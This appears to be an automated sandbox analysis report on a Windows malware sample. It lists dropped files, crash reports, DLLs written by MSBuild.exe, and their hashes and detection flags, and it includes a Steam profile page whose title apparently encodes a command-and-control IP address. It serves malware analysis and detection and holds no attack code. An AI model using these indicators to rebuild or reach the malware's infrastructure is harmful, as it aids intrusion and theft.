                                                                                                                                                                                                                    SHA-512:0127AC9D6A6905D72B421B141D4444E9A98A1E36B4BF8085EEA8CA5C859C84A33165DD202F9D351F889A6C0E12B46658528C28D296C60C5F5FFD608EB4454A7A
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.4.9.1.7.9.8.3.5.2.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.4.9.1.8.2.6.4.7.9.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.b.f.0.a.7.-.e.1.d.0.-.4.0.7.6.-.9.8.e.3.-.b.5.c.9.7.1.e.6.3.e.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.9.1.0.3.0.1.-.6.8.e.b.-.4.4.0.f.-.9.e.4.7.-.3.3.d.b.1.0.0.7.6.d.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.B.F.C.F.B.F.B.F.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.8.4.-.0.0.0.1.-.0.0.1.4.-.4.a.1.d.-.b.a.4.9.9.6.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.8.5.b.b.c.c.0.b.d.0.8.7.f.8.7.f.6.6.2.c.e.e.3.e.f.1.7.9.6.2.8.0.0.0.0.f.f.f.f.!.0.0.0.0.b.b.6.c.b.f.c.6.e.f.0.7.c.8.e.e.1.f.2.8.7.f.3.b.e.5.6.9.0.d.0.f.f.a.5.a.c.9.e.a.!.C.B.F.C.F.B.F.B.F.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.699272694338223
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:lNQAqvFPlc0BU/MT3ju1zuiFrZ24IO8kSB:cFNXBU/wjczuiFrY4IO8L
                                                                                                                                                                                                                    MD5:DAAB52D2F1E83D4BD2588453785ADE06
                                                                                                                                                                                                                    SHA1:EBEA35B02F2606C49D8585815E58B78594F143AF
                                                                                                                                                                                                                    SHA-256:51373135C2EE8D2686B660B761405F2ADC671E4A9A72E1C4B4A6BE0BEBB69E1A
                                                                                                                                                                                                                    SHA-512:BBD38712C7492BEE860BBFE71BFEA8F0BDD145B6EA918CB610FCA2696754DB62F8D8A159D8122B72F6F349047ECF44D8F08A08ECFEBD7BFFA062ADF2348E1AA7
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.4.8.4.6.9.7.3.8.4.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.4.8.4.8.0.9.8.8.5.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.0.b.f.0.d.2.-.1.0.e.6.-.4.6.2.9.-.a.e.6.d.-.e.5.2.2.8.3.0.7.2.c.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.1.3.2.7.7.4.-.7.d.c.b.-.4.6.4.2.-.9.b.c.b.-.f.a.8.c.5.e.6.4.b.9.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.3.4.-.0.0.0.1.-.0.0.1.4.-.d.0.4.2.-.f.8.1.f.9.6.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.c.e.5.1.f.e.b.0.e.8.1.8.f.5.a.c.b.6.b.a.4.f.1.d.e.b.9.f.4.f.e.f.0.4.d.7.c.d.6.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.3.:.
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 13:14:07 2024, 0x1205a4 type
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35612
                                                                                                                                                                                                                    Entropy (8bit):1.7193407298282355
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:5U8sJP+WqHWKhkrjnXs2ti73V+RkyHRQ1SUBxdjWIdWI8VIYjRpoZzB7ctNsnd:xsJmqvTtOSRQ1Saxd4jRp+zB7cQ
                                                                                                                                                                                                                    MD5:6E8AB42CAE05D404375BAB87E06B2BFC
                                                                                                                                                                                                                    SHA1:263EE868457F48DF5B3A381EFB531C4CB8610F48
                                                                                                                                                                                                                    SHA-256:0260F6FDA8DC8617ABFCE3370C1890E4880F5FD9A0A15B2869D16884FA9ED7BE
                                                                                                                                                                                                                    SHA-512:37FF1AE17878F53701FA52644E83D81538EBD0D4A2B4CF8EA4761FF31FCE29D625EBB4BFB335494B1C984C7B490AEB1E627E8DD869CC867F4767E4DC8D43C995
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8374
                                                                                                                                                                                                                    Entropy (8bit):3.6953425192257026
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJoCm6r6YSfSU98QNGgmf6hgprJ89bmbGsf3gjm:R6lXJu6r6YKSU94gmfwTmblfw6
                                                                                                                                                                                                                    MD5:242FF77C82FF5A08EAD6395457CB79CF
                                                                                                                                                                                                                    SHA1:C850B8EEBD457914C0140CFCB500F797192D39B3
                                                                                                                                                                                                                    SHA-256:4CFA249F1907DF254609BC505E7F637E1BDC2C28EF95DA28B422792898C79D34
                                                                                                                                                                                                                    SHA-512:8D29B42B540434DE53DADB9F28EF6FBF432E5F14A54448C8F52D013C90B31AD357288C9D9658AEBC07044AAFD04B483162A2533E5D25E1F0D47E45058BAC1CD1
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3636</Pi
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4690
                                                                                                                                                                                                                    Entropy (8bit):4.460245178130973
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zseX6Jg77aI9dSWpW8VYXYm8M4Js5FaKy+q8vPk04hhQd:uIjfFI7Lz7VPJEyKM04hhQd
                                                                                                                                                                                                                    MD5:FC43B11C5E1D9878DE95DEA461FB82C6
                                                                                                                                                                                                                    SHA1:203E4715565A47302F5EDCD8257A00EE92F19AED
                                                                                                                                                                                                                    SHA-256:99B77060CBBC6D5718B26CF16DEA2869585E5BE1ABB48317F61CCA8A35C884B5
                                                                                                                                                                                                                    SHA-512:95F46D40521CAF4072C8A15D6E703A43DA0207FD3973BF853A64A02171B8E4062DFFDD4F7B5DAAB4900AB6DEE0FB12FF004BC55F1302D009BE6C94D45F0F7D82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 13:15:18 2024, 0x1205a4 type
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35200
                                                                                                                                                                                                                    Entropy (8bit):1.7645649445415315
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:5F8telNvmrm2LVs42XE0hi73QK7dDvOanO5M1xKEA7WIkWI5AQLSCoDreVeZjluq:QYdo6OnxzaM1ogSXDreVUl/
                                                                                                                                                                                                                    MD5:D3F37597875DBACCC0F3E7CB7497F76B
                                                                                                                                                                                                                    SHA1:D8567F7094E42CC7EB25B41AEA1BB00209144838
                                                                                                                                                                                                                    SHA-256:68F4CFF3936B4913E070A35D90149461CC8D88CAF74236F47C5F7CFF3E5032D5
                                                                                                                                                                                                                    SHA-512:1B31CB37E5560899E580C0C9E9985A4E97EC3067326C81A4028D57ACA870DB16AF8821B5C138CB4F6BF7F3D81D071750FAB7200AB33580CA492DEAB45724D237
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):8398
                                                                                                                                                                                                                    Entropy (8bit):3.702040278883158
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJoz6S6Ybz6begmf7gpr989brqsflZm:R6lXJ86S6Yf6begmf7HrJfS
                                                                                                                                                                                                                    MD5:A3B9A6E02523EAA283BF4555A8F0404E
                                                                                                                                                                                                                    SHA1:1044CE0A6027A8C1581CDC2F1FCAC0B590B36C81
                                                                                                                                                                                                                    SHA-256:B191060DE377CA5E844CA3DCDC8FAC08A935446935DECE6508DF4F0022CA456E
                                                                                                                                                                                                                    SHA-512:2CA127157387B5687F2081BCE6D8B6EA29EB9ABC41171FED3972CBBD1C1093B49601CADB0B105919D7F8922B7E4197CE2B912E74855868C5B51FE5EC10A8B539
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>900</Pid
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4720
                                                                                                                                                                                                                    Entropy (8bit):4.491506652013872
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zseXRJg77aI9dSWpW8VYSYm8M4Jx5Fl+q8vGaN/IKld:uIjfaI7Lz7VWJ7KxNgKld
                                                                                                                                                                                                                    MD5:E44DA4B571A68E0F061DE1A4CC8106B3
                                                                                                                                                                                                                    SHA1:58973A7AFCC410DD3AB8EBE5914A21668925031E
                                                                                                                                                                                                                    SHA-256:ACA4ECE86514EC1AD8EA9C85C3A80162126E2EE4A85807202FE6CD290F083DCA
                                                                                                                                                                                                                    SHA-512:51BAC9CE54783F4E703326413A985ADA63A9EAAEB7316396CF9C3FB178C02354ACEFAAD3C2242CB8831B6310DA495386770897E404D2A4A8EFDF2639C1FD0DAD
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527297" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):685392
                                                                                                                                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):608080
                                                                                                                                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):450024
                                                                                                                                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2046288
                                                                                                                                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):257872
                                                                                                                                                                                                                    Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                    MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):80880
                                                                                                                                                                                                                    Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                    MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):34879
                                                                                                                                                                                                                    Entropy (8bit):5.398288267525573
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x28:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPY
                                                                                                                                                                                                                    MD5:937AF9CA5D9AE8BBA7A1DEEAC1B5FE56
                                                                                                                                                                                                                    SHA1:E9C04993C99B7F1561C2924D42C684BAB531035A
                                                                                                                                                                                                                    SHA-256:2A6E3726D57F9C4BAF90A11009715C9748419F62EB3C7B9ADA420A72F25985EF
                                                                                                                                                                                                                    SHA-512:ACF126A9A8FF18DDAD2A6234FEE013F5C47EC9B04A171CB51CB9BBEE09FF042A94D63418F10C903BEE54A15B48413B37125CC0E28246A42183E02FDE90636A47
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):540536
                                                                                                                                                                                                                    Entropy (8bit):7.7458511305233015
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:TP12qROL6BdHCinYPrcYVfplaR3eumU9bxsG6oDPZ:xXXPiinMIKlaROymxo7Z
                                                                                                                                                                                                                    MD5:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    SHA1:BB6CBFC6EF07C8EE1F287F3BE5690D0FFA5AC9EA
                                                                                                                                                                                                                    SHA-256:A6B03FCC5F34E1A4546A92C1B6CCC6ED2DDC92965437D0BB64D4F0E515E22C0E
                                                                                                                                                                                                                    SHA-512:33B6B2AD17C160BF5543D95CB0D2C000FB0B89FDE8BC55DA8424FDEFFA3A4CCC3DE7185CE2E520C421624F714CCFCF83DB09469359F4D41F74B7C2E840C9CA2D
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    File Type:EBCDIC text, with very long lines (65536), with no line terminators, with overstriking
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1048575
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:X7:r
                                                                                                                                                                                                                    MD5:6C37C81FBB253DEA370A9BB1B013084A
                                                                                                                                                                                                                    SHA1:AF9E05215B75BE7D5636DBA75793319833F5A67A
                                                                                                                                                                                                                    SHA-256:F0CBC300DFD548B8CFB6764348F28F318A379AE04B177140E86976230BDADF53
                                                                                                                                                                                                                    SHA-512:F4BCECEEAEA0CF027172B52AE05B5E9FF4AE9A80C170D7D0E30AB9A727759478644790F62C41A5963DD9E0C3BE3B5870B65A242CA7CD3CFDBF441BC7E20BA52E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                    Entropy (8bit):4.37456230525771
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6144:BFVfpi6ceLP/9skLmb0dyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:nV1XyWWI/glMM6kF7qq
                                                                                                                                                                                                                    MD5:744F9BC57AF1580E267ADF1A38AD0162
                                                                                                                                                                                                                    SHA1:44BDA3C017753B8924B92355F4D483E8C0A48A0B
                                                                                                                                                                                                                    SHA-256:EEDB51D326933F1AC2B7F26253A6834452E04ACB8A9257E8DEF034C08DE37105
                                                                                                                                                                                                                    SHA-512:AE27738831D41B91AB60FE9DDE83E8A00E12B9DB37B779AC5DDBBE658F5F3DD150E846DCCCFB21D30C3D0D1884E679BFABC06A0246B16F8B0CCAFDEDE3062643
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):7.768601032668871
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                                                    File size:573'304 bytes
                                                                                                                                                                                                                    MD5:c9784db0c88a05a8aae9ddb7289b51db
                                                                                                                                                                                                                    SHA1:7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
                                                                                                                                                                                                                    SHA256:fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
                                                                                                                                                                                                                    SHA512:5dcbe1ea972859d9be452355774aef12c99a65824e7ffc47f6229ee0ca8d460b0d6ef2c9209dd03eb92fc48ab89d4a96bb2fc0c5518111e55361b1ddad70b095
                                                                                                                                                                                                                    SSDEEP:12288:W/VmqBOr6mq0eOValpFrLeIOu2qSturmTdFtiDPF:0nHYKr5iIOu2qcOmTnti7F
                                                                                                                                                                                                                    TLSH:7EC4011175C08031CA73163619E8DB745E7EBD614AB2AE9F67944B7E0F302C2D621BBB
                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`...`...`.......l...............u....R..r....R..t.......e...`...9....R.......Q..a....Qz.a....Q..a...Rich`...........PE..L..
